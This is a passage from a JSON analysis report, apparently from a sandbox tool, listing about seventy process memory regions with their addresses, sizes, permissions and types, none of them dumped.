monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_135", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 274431, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 331775, "entry_point": 0, "filename": null, "id": "region_137", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 405503, "entry_point": 0, "filename": null, "id": "region_138", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_139", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1519615, "entry_point": 0, "filename": null, "id": "region_140", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_141", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1650687, "entry_point": 0, "filename": null, "id": "region_142", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_143", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_144", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3305471, "entry_point": 2883584, "filename": "\\Windows\\System32\\locale.nls", "id": "region_146", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2883584, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 4390911, "entry_point": 0, "filename": null, "id": "region_147", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4403199, "entry_point": 0, "filename": null, "id": "region_148", "name": "pagefile_0x0000000000430000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4390912, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_149", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 5570559, "entry_point": 0, "filename": null, "id": "region_150", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 7176191, "entry_point": 0, "filename": null, "id": "region_151", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8785919, "entry_point": 0, "filename": null, "id": "region_152", "name": "pagefile_0x00000000006e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7208960, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 29818879, "entry_point": 0, "filename": null, "id": "region_153", "name": "pagefile_0x0000000000870000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8847360, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 29818880, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x0000000001c70000", "norm_filename": null, "region_type": "private_memory", "start_va": 29818880, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 200704, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 31068159, "entry_point": 0, "filename": null, "id": "region_155", "name": "private_0x0000000001d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 30867456, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 31129600, "type": "region", "version": 1 }, "end_va": 31150079, "entry_point": 0, "filename": null, "id": "region_156", "name": "private_0x0000000001db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31129600, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 196608, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_157", "name": "private_0x0000000001dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31195136, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 31457279, "entry_point": 0, "filename": null, "id": "region_158", "name": "private_0x0000000001df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31391744, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 31461375, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x0000000001e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 31457280, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 31522816, "type": "region", "version": 1 }, "end_va": 31588351, "entry_point": 0, "filename": null, "id": "region_160", "name": "private_0x0000000001e10000", "norm_filename": null, "region_type": "private_memory", "start_va": 31522816, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 31588352, "type": "region", "version": 1 }, "end_va": 31653887, "entry_point": 0, "filename": null, "id": "region_161", "name": "private_0x0000000001e20000", "norm_filename": null, "region_type": "private_memory", "start_va": 31588352, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 31653888, "type": "region", "version": 1 }, "end_va": 31662079, "entry_point": 0, "filename": null, "id": "region_162", "name": "pagefile_0x0000000001e30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31653888, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_163", "name": "private_0x0000000001e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 31719424, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 31850495, "entry_point": 0, "filename": null, "id": "region_164", "name": "private_0x0000000001e50000", "norm_filename": null, "region_type": "private_memory", "start_va": 31784960, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 31916031, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x0000000001e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 31850496, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 31981567, "entry_point": 0, "filename": null, "id": "region_166", "name": "private_0x0000000001e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 31916032, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 31985663, "entry_point": 0, "filename": null, "id": "region_167", "name": "private_0x0000000001e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 31981568, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32047104, "type": "region", "version": 1 }, "end_va": 32051199, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x0000000001e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 32047104, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x0000000001ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32112640, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_171", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32374783, "entry_point": 0, "filename": null, "id": "region_172", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 32440319, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x0000000001ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32374784, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32440320, "type": "region", "version": 1 }, "end_va": 32505855, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x0000000001ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32440320, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 32571391, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32571392, "type": "region", "version": 1 }, "end_va": 32636927, "entry_point": 0, "filename": null, "id": "region_176", "name": "private_0x0000000001f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 32571392, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32636928, "type": "region", "version": 1 }, "end_va": 32702463, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x0000000001f20000", "norm_filename": null, "region_type": "private_memory", "start_va": 32636928, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32702464, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_178", "name": "private_0x0000000001f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 32702464, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 32833535, "entry_point": 0, "filename": null, "id": "region_179", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 32899071, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x0000000001f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 32833536, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 32964607, "entry_point": 0, "filename": null, "id": "region_181", "name": "private_0x0000000001f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 32899072, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_182", "name": "private_0x0000000001f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 32964608, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 33083391, "entry_point": 0, "filename": null, "id": "region_183", "name": "private_0x0000000001f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 33030144, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 33099775, "entry_point": 0, "filename": null, "id": "region_184", "name": "pagefile_0x0000000001f90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33095680, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 33161216, "type": "region", "version": 1 }, "end_va": 33173503, "entry_point": 0, "filename": null, "id": "region_185", "name": "pagefile_0x0000000001fa0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33161216, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 33472511, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000001fe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33423360, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_187", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 34275327, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x0000000002030000", "norm_filename": null, "region_type": "private_memory", "start_va": 33751040, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 34275328, "type": "region", "version": 1 }, "end_va": 35188735, "entry_point": 0, "filename": null, "id": "region_189", "name": "pagefile_0x00000000020b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34275328, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 35192832, "type": "region", "version": 1 }, "end_va": 35196927, "entry_point": 0, "filename": null, "id": "region_190", "name": "pagefile_0x0000000002190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35192832, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 35258368, "type": "region", "version": 1 }, "end_va": 35323903, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x00000000021a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35258368, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37093376, "type": "region", "version": 1 }, "end_va": 37158911, "entry_point": 0, "filename": null, "id": "region_192", "name": "private_0x0000000002360000", "norm_filename": null, "region_type": "private_memory", "start_va": 37093376, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37158912, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000002370000", "norm_filename": null, "region_type": "private_memory", "start_va": 37158912, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x0000000002380000", "norm_filename": null, "region_type": "private_memory", "start_va": 37224448, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 61440, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 37351423, "entry_point": 0, "filename": null, "id": "region_195", "name": "private_0x0000000002390000", "norm_filename": null, "region_type": "private_memory", "start_va": 37289984, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 37421055, "entry_point": 0, "filename": null, "id": "region_196", "name": "private_0x00000000023a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37355520, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37425151, "entry_point": 0, "filename": null, "id": "region_197", "name": "pagefile_0x00000000023b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37421056, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37507071, "entry_point": 0, "filename": null, "id": "region_198", "name": "pagefile_0x00000000023c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37486592, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 37617663, "entry_point": 0, "filename": null, "id": "region_199", "name": "private_0x00000000023d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37552128, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37683200, "type": "region", "version": 1 }, "end_va": 37748735, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x00000000023f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37683200, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37748736, "type": "region", "version": 1 }, "end_va": 37814271, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x0000000002400000", "norm_filename": null, "region_type": "private_memory", "start_va": 37748736, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 37842943, "entry_point": 0, "filename": null, "id": "region_202", "name": "pagefile_0x0000000002410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37814272, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 37879808, "type": "region", "version": 1 }, "end_va": 37887999, "entry_point": 0, "filename": null, "id": "region_203", "name": "pagefile_0x0000000002420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37879808, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 37949439, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x0000000002430000", "norm_filename": null, "region_type": "private_memory", "start_va": 37945344, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38010880, "type": "region", "version": 1 }, "end_va": 38014975, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x0000000002440000", "norm_filename": null, "region_type": "private_memory", 